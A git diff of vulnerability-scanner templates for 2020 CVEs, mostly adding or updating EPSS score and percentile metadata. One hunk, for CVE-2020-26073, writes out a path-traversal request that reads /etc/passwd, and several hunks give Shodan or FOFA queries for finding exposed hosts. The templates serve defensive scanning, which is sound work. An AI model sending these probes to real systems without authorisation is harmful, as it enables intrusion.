cpe:2.3:a:fhem:fhem:6.0:*:*:*:*:*:*:* + epss-percentile: 0.93744 metadata: max-request: 1 vendor: fhem diff --git a/http/cves/2020/CVE-2020-1943.yaml b/http/cves/2020/CVE-2020-1943.yaml index 20fafdd20d..f6b89f585d 100644 --- a/http/cves/2020/CVE-2020-1943.yaml +++ b/http/cves/2020/CVE-2020-1943.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.9737 cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* + epss-percentile: 0.99851 metadata: max-request: 1 vendor: apache diff --git a/http/cves/2020/CVE-2020-19515.yaml b/http/cves/2020/CVE-2020-19515.yaml index e81e531373..236c3743b2 100644 --- a/http/cves/2020/CVE-2020-19515.yaml +++ b/http/cves/2020/CVE-2020-19515.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00102 cpe: cpe:2.3:a:qdpm:qdpm:9.1:*:*:*:*:*:*:* + epss-percentile: 0.40864 metadata: max-request: 1 shodan-query: http.favicon.hash:762074255 diff --git a/http/cves/2020/CVE-2020-1956.yaml b/http/cves/2020/CVE-2020-1956.yaml index c1fae974e4..0aae32afc9 100644 --- a/http/cves/2020/CVE-2020-1956.yaml +++ b/http/cves/2020/CVE-2020-1956.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-78 epss-score: 0.97423 cpe: cpe:2.3:a:apache:kylin:*:*:*:*:*:*:*:* + epss-percentile: 0.99894 metadata: max-request: 2 verified: true diff --git a/http/cves/2020/CVE-2020-19625.yaml b/http/cves/2020/CVE-2020-19625.yaml index 61d67b1613..ed04e3f00b 100644 --- a/http/cves/2020/CVE-2020-19625.yaml +++ b/http/cves/2020/CVE-2020-19625.yaml @@ -16,6 +16,7 @@ info: cve-id: CVE-2020-19625 epss-score: 0.88684 cpe: cpe:2.3:a:gridx_project:gridx:1.3:*:*:*:*:*:*:* + epss-percentile: 0.98276 metadata: max-request: 1 vendor: gridx_project diff --git a/http/cves/2020/CVE-2020-20285.yaml b/http/cves/2020/CVE-2020-20285.yaml index 523d314086..ef8b1d207f 100644 --- a/http/cves/2020/CVE-2020-20285.yaml +++ b/http/cves/2020/CVE-2020-20285.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.0009 cpe: cpe:2.3:a:zzcms:zzcms:2019:*:*:*:*:*:*:* + epss-percentile: 0.37386 metadata: max-request: 1 fofa-query: zzcms diff --git a/http/cves/2020/CVE-2020-20300.yaml b/http/cves/2020/CVE-2020-20300.yaml index 2155967033..c48904fecb 100644 --- a/http/cves/2020/CVE-2020-20300.yaml +++ b/http/cves/2020/CVE-2020-20300.yaml @@ -14,8 +14,9 @@ info: cvss-score: 9.8 cve-id: CVE-2020-20300 cwe-id: CWE-89 - epss-score: 0.26416 + epss-score: 0.218 cpe: cpe:2.3:a:weiphp:weiphp:5.0:*:*:*:*:*:*:* + epss-percentile: 0.95816 metadata: max-request: 1 shodan-query: http.html:"WeiPHP5.0" diff --git a/http/cves/2020/CVE-2020-2036.yaml b/http/cves/2020/CVE-2020-2036.yaml index a9e00a1871..9e3e8df5b0 100644 --- a/http/cves/2020/CVE-2020-2036.yaml +++ b/http/cves/2020/CVE-2020-2036.yaml @@ -15,8 +15,9 @@ info: cvss-score: 8.8 cve-id: CVE-2020-2036 cwe-id: CWE-79 - epss-score: 0.0109 + epss-score: 0.00951 cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* + epss-percentile: 0.81231 metadata: max-request: 2 vendor: paloaltonetworks diff --git a/http/cves/2020/CVE-2020-2096.yaml b/http/cves/2020/CVE-2020-2096.yaml index 7735a620c9..1e9d4ddcd3 100644 --- a/http/cves/2020/CVE-2020-2096.yaml +++ b/http/cves/2020/CVE-2020-2096.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.96767 cpe: cpe:2.3:a:jenkins:gitlab_hook:*:*:*:*:*:jenkins:*:* + epss-percentile: 0.9952 metadata: max-request: 1 shodan-query: http.title:"GitLab" diff --git a/http/cves/2020/CVE-2020-20982.yaml b/http/cves/2020/CVE-2020-20982.yaml index 2a5a53c87f..32c5eda2cb 100644 --- a/http/cves/2020/CVE-2020-20982.yaml +++ b/http/cves/2020/CVE-2020-20982.yaml @@ -13,8 +13,9 @@ info: cvss-score: 9.6 cve-id: CVE-2020-20982 cwe-id: CWE-79 - epss-score: 0.03503 + epss-score: 0.01894 cpe: cpe:2.3:a:wdja:wdja_cms:1.5.1:*:*:*:*:*:*:* + epss-percentile: 0.87011 metadata: max-request: 1 verified: true diff --git a/http/cves/2020/CVE-2020-20988.yaml b/http/cves/2020/CVE-2020-20988.yaml index b3a3d7e1b8..cc4f588d1d 100644 --- a/http/cves/2020/CVE-2020-20988.yaml +++ b/http/cves/2020/CVE-2020-20988.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.0009 cpe: cpe:2.3:a:domainmod:domainmod:4.13.0:*:*:*:*:*:*:* + epss-percentile: 0.37386 metadata: max-request: 2 verified: true diff --git a/http/cves/2020/CVE-2020-21012.yaml b/http/cves/2020/CVE-2020-21012.yaml index f82503a729..59cef02474 100644 --- a/http/cves/2020/CVE-2020-21012.yaml +++ b/http/cves/2020/CVE-2020-21012.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2020-21012 cwe-id: CWE-89 - epss-score: 0.10567 + epss-score: 0.07545 cpe: cpe:2.3:a:hotel_and_lodge_booking_management_system_project:hotel_and_lodge_booking_management_system:2.0:*:*:*:*:*:*:* + epss-percentile: 0.93277 metadata: max-request: 1 verified: true diff --git a/http/cves/2020/CVE-2020-2103.yaml b/http/cves/2020/CVE-2020-2103.yaml index 7a2ae707b1..aecdea7bd5 100644 --- a/http/cves/2020/CVE-2020-2103.yaml +++ b/http/cves/2020/CVE-2020-2103.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-200 epss-score: 0.00534 cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:* + epss-percentile: 0.74191 metadata: max-request: 2 shodan-query: http.favicon.hash:81586312 diff --git a/http/cves/2020/CVE-2020-21224.yaml b/http/cves/2020/CVE-2020-21224.yaml index 14905869fb..e7c35160ec 100644 --- a/http/cves/2020/CVE-2020-21224.yaml +++ b/http/cves/2020/CVE-2020-21224.yaml @@ -14,8 +14,9 @@ info: cvss-score: 9.8 cve-id: CVE-2020-21224 cwe-id: CWE-88 - epss-score: 0.03 + epss-score: 0.03105 cpe: cpe:2.3:a:inspur:clusterengine:4.0:*:*:*:*:*:*:* + epss-percentile: 0.89779 metadata: max-request: 1 vendor: inspur diff --git a/http/cves/2020/CVE-2020-2140.yaml b/http/cves/2020/CVE-2020-2140.yaml index 2c3fad490f..9900f50db9 100644 --- a/http/cves/2020/CVE-2020-2140.yaml +++ b/http/cves/2020/CVE-2020-2140.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.1 cve-id: CVE-2020-2140 cwe-id: CWE-79 - epss-score: 0.00208 + epss-score: 0.00181 cpe: cpe:2.3:a:jenkins:audit_trail:*:*:*:*:*:jenkins:*:* + epss-percentile: 0.54659 metadata: max-request: 2 framework: jenkins diff --git a/http/cves/2020/CVE-2020-22208.yaml b/http/cves/2020/CVE-2020-22208.yaml index 512a4ab04f..e77c32ab70 100644 --- a/http/cves/2020/CVE-2020-22208.yaml +++ b/http/cves/2020/CVE-2020-22208.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-89 epss-score: 0.10555 cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:* + epss-percentile: 0.94277 metadata: max-request: 1 fofa-query: app="74cms" diff --git a/http/cves/2020/CVE-2020-22209.yaml b/http/cves/2020/CVE-2020-22209.yaml index 6e20c473fa..d3b7395cc9 100644 --- a/http/cves/2020/CVE-2020-22209.yaml +++ b/http/cves/2020/CVE-2020-22209.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-89 epss-score: 0.10555 cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:* + epss-percentile: 0.94277 metadata: max-request: 1 fofa-query: app="74cms" diff --git a/http/cves/2020/CVE-2020-22210.yaml b/http/cves/2020/CVE-2020-22210.yaml index 4a847b0444..2ed80a6fa5 100644 --- a/http/cves/2020/CVE-2020-22210.yaml +++ b/http/cves/2020/CVE-2020-22210.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-89 epss-score: 0.10555 cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:* + epss-percentile: 0.94277 metadata: max-request: 1 fofa-query: app="74cms" diff --git a/http/cves/2020/CVE-2020-22211.yaml b/http/cves/2020/CVE-2020-22211.yaml index 6900bf5e8f..6cc741bf73 100644 --- a/http/cves/2020/CVE-2020-22211.yaml +++ b/http/cves/2020/CVE-2020-22211.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-89 epss-score: 0.10555 cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:* + epss-percentile: 0.94277 metadata: max-request: 1 fofa-query: app="74cms" diff --git a/http/cves/2020/CVE-2020-22840.yaml b/http/cves/2020/CVE-2020-22840.yaml index 6f01ab0006..7cf44b81d8 100644 --- a/http/cves/2020/CVE-2020-22840.yaml +++ b/http/cves/2020/CVE-2020-22840.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-601 epss-score: 0.01174 cpe: cpe:2.3:a:b2evolution:b2evolution:*:*:*:*:*:*:*:* + epss-percentile: 0.83233 metadata: max-request: 1 vendor: b2evolution diff --git a/http/cves/2020/CVE-2020-23015.yaml b/http/cves/2020/CVE-2020-23015.yaml index d6a269c18b..919535e15f 100644 --- a/http/cves/2020/CVE-2020-23015.yaml +++ b/http/cves/2020/CVE-2020-23015.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-601 epss-score: 0.00228 cpe: cpe:2.3:a:opnsense:opnsense:*:*:*:*:*:*:*:* + epss-percentile: 0.60346 metadata: max-request: 1 vendor: opnsense diff --git a/http/cves/2020/CVE-2020-23517.yaml b/http/cves/2020/CVE-2020-23517.yaml index d1d3e3a122..6705d1f51b 100644 --- a/http/cves/2020/CVE-2020-23517.yaml +++ b/http/cves/2020/CVE-2020-23517.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-79 epss-score: 0.00118 cpe: cpe:2.3:a:aryanic:high_cms:*:*:*:*:*:*:*:* + epss-percentile: 0.45089 metadata: max-request: 2 verified: true diff --git a/http/cves/2020/CVE-2020-23575.yaml b/http/cves/2020/CVE-2020-23575.yaml index 5e0a65693e..4b672bdab4 100644 --- a/http/cves/2020/CVE-2020-23575.yaml +++ b/http/cves/2020/CVE-2020-23575.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-22 epss-score: 0.01879 cpe: cpe:2.3:o:kyocera:d-copia253mf_plus_firmware:-:*:*:*:*:*:*:* + epss-percentile: 0.86948 metadata: max-request: 1 vendor: kyocera diff --git a/http/cves/2020/CVE-2020-23697.yaml b/http/cves/2020/CVE-2020-23697.yaml index 01d7972e96..c9c01bbe18 100644 --- a/http/cves/2020/CVE-2020-23697.yaml +++ b/http/cves/2020/CVE-2020-23697.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.0009 cpe: cpe:2.3:a:monstra:monstra_cms:3.0.4:*:*:*:*:*:*:* + epss-percentile: 0.37386 metadata: max-request: 4 verified: true diff --git a/http/cves/2020/CVE-2020-23972.yaml b/http/cves/2020/CVE-2020-23972.yaml index 6750707cde..09416ea52d 100644 --- a/http/cves/2020/CVE-2020-23972.yaml +++ b/http/cves/2020/CVE-2020-23972.yaml @@ -17,15 +17,15 @@ info: cvss-score: 7.5 cve-id: CVE-2020-23972 cwe-id: CWE-434 - epss-score: 0.68335 + epss-score: 0.59376 cpe: cpe:2.3:a:gmapfp:gmapfp:j3.5:*:*:*:-:joomla\!:*:* + epss-percentile: 0.9731 metadata: max-request: 2 framework: joomla\! vendor: gmapfp product: gmapfp tags: cve,cve2020,joomla,edb,packetstorm,fileupload,intrusive - variables: name: "{{to_lower(rand_text_alpha(5))}}" diff --git a/http/cves/2020/CVE-2020-24148.yaml b/http/cves/2020/CVE-2020-24148.yaml index 29ace0f6d3..08f2785822 100644 --- a/http/cves/2020/CVE-2020-24148.yaml +++ b/http/cves/2020/CVE-2020-24148.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.1 cve-id: CVE-2020-24148 cwe-id: CWE-918 - epss-score: 0.06154 + epss-score: 0.06584 cpe: cpe:2.3:a:mooveagency:import_xml_and_rss_feeds:2.0.1:*:*:*:*:wordpress:*:* + epss-percentile: 0.92859 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2020/CVE-2020-24186.yaml b/http/cves/2020/CVE-2020-24186.yaml index 0da13314fd..70bd6f7df8 100644 --- a/http/cves/2020/CVE-2020-24186.yaml +++ b/http/cves/2020/CVE-2020-24186.yaml @@ -15,8 +15,9 @@ info: cvss-score: 10 cve-id: CVE-2020-24186 cwe-id: CWE-434 - epss-score: 0.97446 + epss-score: 0.97466 cpe: cpe:2.3:a:gvectors:wpdiscuz:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.99936 metadata: max-request: 2 framework: wordpress diff --git a/http/cves/2020/CVE-2020-24223.yaml b/http/cves/2020/CVE-2020-24223.yaml index 2e9b0d2757..65b637d45e 100644 --- a/http/cves/2020/CVE-2020-24223.yaml +++ b/http/cves/2020/CVE-2020-24223.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00976 cpe: cpe:2.3:a:mara_cms_project:mara_cms:7.5:*:*:*:*:*:*:* + epss-percentile: 0.81474 metadata: max-request: 1 vendor: mara_cms_project diff --git a/http/cves/2020/CVE-2020-24312.yaml b/http/cves/2020/CVE-2020-24312.yaml index 5dde1284ee..9817359823 100644 --- a/http/cves/2020/CVE-2020-24312.yaml +++ b/http/cves/2020/CVE-2020-24312.yaml @@ -14,8 +14,9 @@ info: cvss-score: 7.5 cve-id: CVE-2020-24312 cwe-id: CWE-552 - epss-score: 0.02033 + epss-score: 0.01899 cpe: cpe:2.3:a:webdesi9:file_manager:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.87035 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2020/CVE-2020-24391.yaml b/http/cves/2020/CVE-2020-24391.yaml index 40ce478a1f..183cdee90f 100644 --- a/http/cves/2020/CVE-2020-24391.yaml +++ b/http/cves/2020/CVE-2020-24391.yaml @@ -14,8 +14,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-24391 - epss-score: 0.48236 + epss-score: 0.49786 cpe: cpe:2.3:a:mongo-express_project:mongo-express:*:*:*:*:*:node.js:*:* + epss-percentile: 0.9707 metadata: max-request: 3 framework: node.js diff --git a/http/cves/2020/CVE-2020-24550.yaml b/http/cves/2020/CVE-2020-24550.yaml index 4884a2309a..29a8e4466f 100644 --- a/http/cves/2020/CVE-2020-24550.yaml +++ b/http/cves/2020/CVE-2020-24550.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-601 epss-score: 0.00157 cpe: cpe:2.3:a:episerver:find:*:*:*:*:*:*:*:* + epss-percentile: 0.5154 metadata: max-request: 1 vendor: episerver diff --git a/http/cves/2020/CVE-2020-24571.yaml b/http/cves/2020/CVE-2020-24571.yaml index 18be48982a..8d2a76e4e8 100644 --- a/http/cves/2020/CVE-2020-24571.yaml +++ b/http/cves/2020/CVE-2020-24571.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-22 epss-score: 0.02885 cpe: cpe:2.3:a:nexusdb:nexusdb:*:*:*:*:*:*:*:* + epss-percentile: 0.89445 metadata: max-request: 1 vendor: nexusdb diff --git a/http/cves/2020/CVE-2020-24579.yaml b/http/cves/2020/CVE-2020-24579.yaml index 11426fb13d..1f0c57b928 100644 --- a/http/cves/2020/CVE-2020-24579.yaml +++ b/http/cves/2020/CVE-2020-24579.yaml @@ -14,8 +14,9 @@ info: cvss-score: 8.8 cve-id: CVE-2020-24579 cwe-id: CWE-287 - epss-score: 0.00642 + epss-score: 0.00455 cpe: cpe:2.3:o:dlink:dsl2888a_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.72083 metadata: max-request: 2 vendor: dlink diff --git a/http/cves/2020/CVE-2020-24589.yaml b/http/cves/2020/CVE-2020-24589.yaml index 5336c2ad97..d2bc49193b 100644 --- a/http/cves/2020/CVE-2020-24589.yaml +++ b/http/cves/2020/CVE-2020-24589.yaml @@ -13,8 +13,9 @@ info: cvss-score: 9.1 cve-id: CVE-2020-24589 cwe-id: CWE-611 - epss-score: 0.55262 + epss-score: 0.57189 cpe: cpe:2.3:a:wso2:api_manager:*:*:*:*:*:*:*:* + epss-percentile: 0.97253 metadata: max-request: 1 vendor: wso2 diff --git a/http/cves/2020/CVE-2020-24902.yaml b/http/cves/2020/CVE-2020-24902.yaml index c2569a13b5..c95365d9e5 100644 --- a/http/cves/2020/CVE-2020-24902.yaml +++ b/http/cves/2020/CVE-2020-24902.yaml @@ -14,8 +14,9 @@ info: cvss-score: 6.1 cve-id: CVE-2020-24902 cwe-id: CWE-79 - epss-score: 0.00171 + epss-score: 0.00179 cpe: cpe:2.3:a:quixplorer_project:quixplorer:*:*:*:*:*:*:*:* + epss-percentile: 0.54405 metadata: max-request: 1 google-query: intitle:"My Download Server" diff --git a/http/cves/2020/CVE-2020-24903.yaml b/http/cves/2020/CVE-2020-24903.yaml index b55b207bdc..ed1b27ad39 100644 --- a/http/cves/2020/CVE-2020-24903.yaml +++ b/http/cves/2020/CVE-2020-24903.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00246 cpe: cpe:2.3:a:cutesoft:cute_editor:6.4:*:*:*:*:asp.net:*:* + epss-percentile: 0.61852 metadata: max-request: 1 shodan-query: http.component:"ASP.NET" diff --git a/http/cves/2020/CVE-2020-24912.yaml b/http/cves/2020/CVE-2020-24912.yaml index f3c9ff5e48..529b1b430c 100644 --- a/http/cves/2020/CVE-2020-24912.yaml +++ b/http/cves/2020/CVE-2020-24912.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.00187 cpe: cpe:2.3:a:qcubed:qcubed:*:*:*:*:*:*:*:* + epss-percentile: 0.55307 metadata: max-request: 3 vendor: qcubed diff --git a/http/cves/2020/CVE-2020-24949.yaml b/http/cves/2020/CVE-2020-24949.yaml index c306a273d1..4cf69856ed 100644 --- a/http/cves/2020/CVE-2020-24949.yaml +++ b/http/cves/2020/CVE-2020-24949.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-77 epss-score: 0.96607 cpe: cpe:2.3:a:php-fusion:php-fusion:9.03.50:*:*:*:*:*:*:* + epss-percentile: 0.99452 metadata: max-request: 1 vendor: php-fusion diff --git a/http/cves/2020/CVE-2020-25078.yaml b/http/cves/2020/CVE-2020-25078.yaml index 642eb77ca6..dfbfe11ae7 100644 --- a/http/cves/2020/CVE-2020-25078.yaml +++ b/http/cves/2020/CVE-2020-25078.yaml @@ -15,6 +15,7 @@ info: cve-id: CVE-2020-25078 epss-score: 0.96829 cpe: cpe:2.3:o:dlink:dcs-2530l_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.99549 metadata: max-request: 1 vendor: dlink diff --git a/http/cves/2020/CVE-2020-25213.yaml b/http/cves/2020/CVE-2020-25213.yaml index c6de6f2eee..07cababd07 100644 --- a/http/cves/2020/CVE-2020-25213.yaml +++ b/http/cves/2020/CVE-2020-25213.yaml @@ -18,8 +18,9 @@ info: cvss-score: 9.8 cve-id: CVE-2020-25213 cwe-id: CWE-434 - epss-score: 0.9739 + epss-score: 0.97341 cpe: cpe:2.3:a:webdesi9:file_manager:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.99825 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2020/CVE-2020-25223.yaml b/http/cves/2020/CVE-2020-25223.yaml index a6339d368d..46200c7a10 100644 --- a/http/cves/2020/CVE-2020-25223.yaml +++ b/http/cves/2020/CVE-2020-25223.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2020-25223 cwe-id: CWE-78 - epss-score: 0.97526 + epss-score: 0.97519 cpe: cpe:2.3:a:sophos:unified_threat_management:*:*:*:*:*:*:*:* + epss-percentile: 0.99975 metadata: max-request: 1 vendor: sophos diff --git a/http/cves/2020/CVE-2020-25495.yaml b/http/cves/2020/CVE-2020-25495.yaml index b7cd395530..115cc72d05 100644 --- a/http/cves/2020/CVE-2020-25495.yaml +++ b/http/cves/2020/CVE-2020-25495.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00153 cpe: cpe:2.3:a:xinuos:openserver:5.0.7:*:*:*:*:*:*:* + epss-percentile: 0.50958 metadata: max-request: 1 vendor: xinuos diff --git a/http/cves/2020/CVE-2020-25506.yaml b/http/cves/2020/CVE-2020-25506.yaml index 359e63fa98..253a0f9438 100644 --- a/http/cves/2020/CVE-2020-25506.yaml +++ b/http/cves/2020/CVE-2020-25506.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-78 epss-score: 0.97451 cpe: cpe:2.3:o:dlink:dns-320_firmware:2.06b01:*:*:*:*:*:*:* + epss-percentile: 0.99921 metadata: max-request: 2 vendor: dlink diff --git a/http/cves/2020/CVE-2020-2551.yaml b/http/cves/2020/CVE-2020-2551.yaml index 1178ef1a59..ecf0a22ece 100644 --- a/http/cves/2020/CVE-2020-2551.yaml +++ b/http/cves/2020/CVE-2020-2551.yaml @@ -16,6 +16,7 @@ info: cve-id: CVE-2020-2551 epss-score: 0.97468 cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* + epss-percentile: 0.99939 metadata: max-request: 1 vendor: oracle diff --git a/http/cves/2020/CVE-2020-25540.yaml b/http/cves/2020/CVE-2020-25540.yaml index 75237d4018..7d34ba0cab 100644 --- a/http/cves/2020/CVE-2020-25540.yaml +++ b/http/cves/2020/CVE-2020-25540.yaml @@ -16,8 +16,9 @@ info: cvss-score: 7.5 cve-id: CVE-2020-25540 cwe-id: CWE-22 - epss-score: 0.96525 + epss-score: 0.96418 cpe: cpe:2.3:a:ctolog:thinkadmin:6.0:*:*:*:*:*:*:* + epss-percentile: 0.99372 metadata: max-request: 1 vendor: ctolog diff --git a/http/cves/2020/CVE-2020-25780.yaml b/http/cves/2020/CVE-2020-25780.yaml index fd1d78a082..f218afdebf 100644 --- a/http/cves/2020/CVE-2020-25780.yaml +++ b/http/cves/2020/CVE-2020-25780.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-22 epss-score: 0.01865 cpe: cpe:2.3:a:commvault:commcell:*:*:*:*:*:*:*:* + epss-percentile: 0.869 metadata: max-request: 1 vendor: commvault diff --git a/http/cves/2020/CVE-2020-25864.yaml b/http/cves/2020/CVE-2020-25864.yaml index 1c000c4bc5..2d31489d6e 100644 --- a/http/cves/2020/CVE-2020-25864.yaml +++ b/http/cves/2020/CVE-2020-25864.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-79 epss-score: 0.00255 cpe: cpe:2.3:a:hashicorp:consul:*:*:*:*:-:*:*:* + epss-percentile: 0.62621 metadata: max-request: 2 vendor: hashicorp diff --git a/http/cves/2020/CVE-2020-26073.yaml b/http/cves/2020/CVE-2020-26073.yaml index 4d3c5a95f7..2b568939da 100644 --- a/http/cves/2020/CVE-2020-26073.yaml +++ b/http/cves/2020/CVE-2020-26073.yaml @@ -11,19 +11,21 @@ info: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26073 classification: cve-id: CVE-2020-26073 - tags: cve,cve2020,cisco,lfi metadata: max-request: 1 + tags: cve,cve2020,cisco,lfi http: - method: GET path: - "{{BaseURL}}/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd" + matchers-condition: and matchers: - type: status status: - 200 + - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2020/CVE-2020-26153.yaml b/http/cves/2020/CVE-2020-26153.yaml index f8cabdf4d4..218fc17c5f 100644 --- a/http/cves/2020/CVE-2020-26153.yaml +++ b/http/cves/2020/CVE-2020-26153.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00127 cpe: cpe:2.3:a:eventespresso:event_espresso:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.46567 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2020/CVE-2020-26214.yaml b/http/cves/2020/CVE-2020-26214.yaml index b096037fe3..78b8c8a1af 100644 --- a/http/cves/2020/CVE-2020-26214.yaml +++ b/http/cves/2020/CVE-2020-26214.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2020-26214 cwe-id: CWE-287 - epss-score: 0.01365 + epss-score: 0.01258 cpe: cpe:2.3:a:alerta_project:alerta:*:*:*:*:*:*:*:* + epss-percentile: 0.83887 metadata: max-request: 1 vendor: alerta_project diff --git a/http/cves/2020/CVE-2020-26217.yaml b/http/cves/2020/CVE-2020-26217.yaml index cb4acd7b2f..ff2ededbd1 100644 --- a/http/cves/2020/CVE-2020-26217.yaml +++ b/http/cves/2020/CVE-2020-26217.yaml @@ -20,6 +20,7 @@ info: cwe-id: CWE-78 epss-score: 0.97456 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* + epss-percentile: 0.99927 metadata: max-request: 1 vendor: xstream_project diff --git a/http/cves/2020/CVE-2020-26248.yaml b/http/cves/2020/CVE-2020-26248.yaml index 1744f058f9..bf3f093b03 100644 --- a/http/cves/2020/CVE-2020-26248.yaml +++ b/http/cves/2020/CVE-2020-26248.yaml @@ -18,8 +18,9 @@ info: cvss-score: 8.2 cve-id: CVE-2020-26248 cwe-id: CWE-89 - epss-score: 0.01488 + epss-score: 0.01502 cpe: cpe:2.3:a:prestashop:productcomments:*:*:*:*:*:prestashop:*:* + epss-percentile: 0.85288 metadata: max-request: 1 verified: true diff --git a/http/cves/2020/CVE-2020-26258.yaml b/http/cves/2020/CVE-2020-26258.yaml index 3b55b213b5..e2c39932a4 100644 --- a/http/cves/2020/CVE-2020-26258.yaml +++ b/http/cves/2020/CVE-2020-26258.yaml @@ -20,6 +20,7 @@ info: cwe-id: CWE-918 epss-score: 0.93377 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* + epss-percentile: 0.98715 metadata: max-request: 1 vendor: xstream_project diff --git a/http/cves/2020/CVE-2020-26413.yaml b/http/cves/2020/CVE-2020-26413.yaml index 11ef5209b4..86468f2e84 100644 --- a/http/cves/2020/CVE-2020-26413.yaml +++ b/http/cves/2020/CVE-2020-26413.yaml @@ -15,8 +15,9 @@ info: cvss-score: 5.3 cve-id: CVE-2020-26413 cwe-id: CWE-200 - epss-score: 0.64648 + epss-score: 0.65771 cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* + epss-percentile: 0.97457 metadata: max-request: 1 shodan-query: http.title:"GitLab" diff --git a/http/cves/2020/CVE-2020-26876.yaml b/http/cves/2020/CVE-2020-26876.yaml index 700221c04f..4aaecdcf7f 100644 --- a/http/cves/2020/CVE-2020-26876.yaml +++ b/http/cves/2020/CVE-2020-26876.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-306 epss-score: 0.01156 cpe: cpe:2.3:a:wpcoursesplugin:wp-courses:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.83081 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2020/CVE-2020-26919.yaml b/http/cves/2020/CVE-2020-26919.yaml index 13fce36c42..6062109e02 100644 --- a/http/cves/2020/CVE-2020-26919.yaml +++ b/http/cves/2020/CVE-2020-26919.yaml @@ -14,8 +14,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-26919 - epss-score: 0.97428 + epss-score: 0.97414 cpe: cpe:2.3:o:netgear:jgs516pe_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.99885 metadata: max-request: 1 vendor: netgear diff --git a/http/cves/2020/CVE-2020-26948.yaml b/http/cves/2020/CVE-2020-26948.yaml index 32212767b8..e8b2a9cc0a 100644 --- a/http/cves/2020/CVE-2020-26948.yaml +++ b/http/cves/2020/CVE-2020-26948.yaml @@ -14,8 +14,9 @@ info: cvss-score: 9.8 cve-id: CVE-2020-26948 cwe-id: CWE-918 - epss-score: 0.04143 + epss-score: 0.06357 cpe: cpe:2.3:a:emby:emby:*:*:*:*:*:*:*:* + epss-percentile: 0.92728 metadata: max-request: 1 vendor: emby diff --git a/http/cves/2020/CVE-2020-27191.yaml b/http/cves/2020/CVE-2020-27191.yaml index d458c14c45..c0c0f0e479 100644 --- a/http/cves/2020/CVE-2020-27191.yaml +++ b/http/cves/2020/CVE-2020-27191.yaml @@ -14,8 +14,9 @@ info: cvss-score: 7.5 cve-id: CVE-2020-27191 cwe-id: CWE-22 - epss-score: 0.00632 + epss-score: 0.00698 cpe: cpe:2.3:a:lionwiki:lionwiki:*:*:*:*:*:*:*:* + epss-percentile: 0.77767 metadata: max-request: 1 vendor: lionwiki diff --git a/http/cves/2020/CVE-2020-2733.yaml b/http/cves/2020/CVE-2020-2733.yaml index 7bc228cf0e..796359522f 100644 --- a/http/cves/2020/CVE-2020-2733.yaml +++ b/http/cves/2020/CVE-2020-2733.yaml @@ 